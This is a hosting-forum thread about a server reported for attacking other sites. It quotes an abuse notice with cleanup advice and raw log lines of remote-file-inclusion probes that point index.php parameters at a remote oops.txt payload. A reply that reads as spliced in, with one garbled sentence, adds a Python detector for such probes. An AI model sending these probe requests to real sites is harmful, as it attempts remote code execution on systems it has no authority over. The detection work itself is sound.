Need some help quick please

RadMan (Verified User, joined Apr 12, 2007, 209 messages, Canada)
I think my server has been hacked and it's attacking other servers..

I thought my colo was off his rocker when he first complained to me yesterday.. Today he got another notification from a different source...

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:

This type of attack typically means the server to which the IP address
of the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious
files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
/var/spool/squid, and /var/spool/cron. Please use "ls -lab" for
checking directories as sometimes compromised servers will have hidden
files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for
suspicious processes; oftentimes the malware / hack pretends to be an
Apache process.

Linux Malware Detect is an excellent program for finding malware on a
server. You can find the latest version at
http://www.rfxn.com/projects/linux-malware-detect/

Clam Anti-virus, clamscan, can also be used to find commonly used PHP
and Perl-based hacks, including various php shells, on a server using
the "--infected" and "--recursive" options.

You may also want to check out using root kit detection tools -
http://www.chkrootkit.org/, http://www.rootkit.nl/, and
http://www.ossec.net/en/rootcheck.html as tools which should be used
in addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.

Code:
Type of attack:

Sample log report including date and time stamp (1st field is the word
"request", 2nd field is the IP address or the domain name being
attacked, and the 3rd field is the IP address or domain name of the
attacker):

  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dt1Qz7pAAADzLoi8 "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dwlQz7pAAADzInIY "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dzVQz7pAAADzFmuE "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d2FQz7pAAAF1no7s "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d41Qz7pAAADzdvYM "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d7lQz7pAAADywcZ0 "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d@VQz7pAAADy9lTA "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000] "GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-eBFQz7pAAADzfwII "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGMpHwk "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:05 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmVQz7pAAABz8XSc "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAAGMpHww "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzPqGw "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAABx4Ebg "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAAByOINM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAABx2Dqw "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMrI-c "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAAGMpHxU "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:27 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j61Qz7pAAADzKodQ "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"

TIA

Ed
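What the abuse desk's sample actually shows is a remote-file-inclusion (RFI) scan: the same `index.php` on several vhosts is hit with one query parameter after another (`lang`, `main`, `go`, ...), each set to a URL on a third host. The script below is an added example, written for this thread and not part of the original post, of rfxn's Linux Malware Detect, or of ClamAV; it parses lines in the "Request: ..." shape the report uses and summarises, per source IP, how many requests carried a URL as a parameter value, which vhosts were hit, which parameter names were tried and over what time span. It goes slightly beyond the report: the leading "Request:" label is optional, so raw Apache vhost_combined access_log lines parse too, and percent-encoded URLs are decoded before the check. The sample data is four lines quoted in the post, rejoined onto single lines, plus one constructed benign request from 198.51.100.7 (a documentation address).

```python
"""Flag remote-file-inclusion (RFI) probes in Apache-style access log lines.

Added example for this thread: not part of the original post and not a
tool from the abuse desk, rfxn or ClamAV.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: four lines quoted in the post, each rejoined onto a
# single line, plus one benign request (198.51.100.7 is a documentation address).
SAMPLE_LOG = [
    'Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] '
    '"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"',
    'Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] '
    '"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"',
    'Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] '
    '"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGMpHwk "-"',
    'Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] '
    '"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"',
    'Request: darklite.ie 198.51.100.7 - - [23/Nov/2012:20:40:00 +0000] '
    '"GET /index.php?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0" UK-constructed0001 "-"',
]

# vhost_combined-style line: vhost client ident user [ts] "method target proto" status bytes ...
# The "Request:" label the abuse desk prepends is optional (assumption: raw
# access_log lines use the same field order without it).
LINE_RE = re.compile(
    r'^(?:Request:\s+)?(?P<vhost>\S+)\s+(?P<src>\S+)\s+\S+\s+\S+\s+'
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>\S+)\s+(?P<target>\S+)\s+[^"]*"\s+'
    r'(?P<status>\d{3})\s+\S+'
)
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
TS_FORMAT = '%d/%b/%Y:%H:%M:%S %z'


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qsl percent-decodes values, so an encoded "http%3A%2F%2F"
    # is seen as "http://" as well.
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    rec['status'] = int(rec['status'])
    rec['time'] = datetime.strptime(rec['ts'], TS_FORMAT)
    return rec


def rfi_params(params):
    """Query parameters whose value is a remote URL: the RFI signature."""
    return [(name, value) for name, value in params if REMOTE_SCHEME.match(value)]


def summarize(lines):
    """Group RFI probes by source IP: hit count, vhosts, parameter names, URLs, time span."""
    by_src = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        flagged = rfi_params(rec['params'])
        if not flagged:
            continue
        entry = by_src.setdefault(rec['src'], {
            'hits': 0, 'vhosts': set(), 'params': set(), 'included_urls': set(),
            'first': rec['time'], 'last': rec['time'],
        })
        entry['hits'] += 1
        entry['vhosts'].add(rec['vhost'])
        for name, value in flagged:
            entry['params'].add(name)
            # The probes carry a trailing "?"; strip it so one payload URL counts once.
            entry['included_urls'].add(value.rstrip('?'))
        entry['first'] = min(entry['first'], rec['time'])
        entry['last'] = max(entry['last'], rec['time'])
    return by_src


def report(summary):
    """One line per source IP, busiest first, in the spirit of the abuse notice."""
    lines = []
    for src, e in sorted(summary.items(), key=lambda kv: -kv[1]['hits']):
        lines.append(
            f"{src}: {e['hits']} RFI probes against {len(e['vhosts'])} vhost(s) "
            f"between {e['first']:%Y-%m-%d %H:%M:%S} and {e['last']:%H:%M:%S %z}; "
            f"params tried: {', '.join(sorted(e['params']))}; "
            f"payload URLs: {', '.join(sorted(e['included_urls']))}"
        )
    return '\n'.join(lines)


if __name__ == '__main__':
    print(report(summarize(SAMPLE_LOG)))
```

The detector keys on the request, not the response: every probe in the report drew a 500 from the target, which says nothing about the sending host, and the abuse desk's point is that the sending host is the one to look at. Run against the local access logs of a box that has been reported, the same parser answers the inverse question (is this server receiving such probes?) by pointing it at the vhost_combined log instead of the abuse desk's excerpt.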
Hi,

I'm available for this kind of service. Feel free to PM me or send me an email (my address is in my signature) for a quote.

Regards
 
Hi John.. Scott is still running a scan to source it...

Server has now been updated with the latest versions of pretty well everything including csf v5.71...

It's been running without interruption for almost 700 days.. I'm counting myself lucky :)

Thanks for asking :)

Ed
 
Updating the server seems to have corrected the issues.. No more complaints now.. Not sure what the source of entry was.. :(
 
please help me

Hello.
I deleted all folders and files in my control panel.
How can I repair my site? I don't have any backup.
How can I reset my hosting?
Please.
 
Hello,

You might want to send me a PM (in English), or a message in Russian through my website (see my signature lines).
 